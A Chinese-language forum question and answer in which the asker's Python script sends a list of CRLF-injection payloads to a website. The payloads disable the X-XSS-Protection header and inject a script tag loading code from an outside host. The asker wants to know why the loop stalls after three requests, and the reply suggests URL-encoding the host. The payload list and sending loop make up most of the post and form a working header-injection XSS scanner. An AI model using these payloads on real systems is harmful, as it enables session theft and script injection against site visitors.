我有一个数组,其中包含我想要发送的一些请求。基本上,我发送的请求是website+目录(在本例中为arrays元素(。例如:http://randomwebsite.com/%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2Fhttp://anotherwebsite.com%3E%0d%0a0%0d%0a/%2e%2e
我的代码:
import requests
site="http://randomwebsite.com"
tcp_server = "http://anotherwebsite.com"
list_of_requests = [
"/%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%0d%0a0%0d%0a/%2e%2e",
"/%0a0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3D" + tcp_server + "%3E%3C%2Fscript%3E",
"/%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%OdX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%23%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%23%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%23%OdX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%25%30%61X-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%25%30aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%250aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%25250aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%2e%2e%2f%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%2f%2e%2e%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%2F..%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%3f%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%3f%OdX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%u000aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E"]
for payload in list_of_requests:
...
[some code here]
...
if str(payload) in requests.get(site + payload).text:
print("Request valid")
else:
print("Request not valid")
我的输出是:
Request not valid
Request not valid
Request not valid
然后程序在发送这3个请求后停止,并且永远保持这种状态。我不明白为什么我不继续发送请求。
这是因为URL没有正确编码。
尝试使用urllib.parse对它们进行编码,如下所示:
import requests
import urllib.parse
site="http://randomwebsite.com"
tcp_server = urllib.parse.quote("anotherwebsite.com")
... <rest of your code>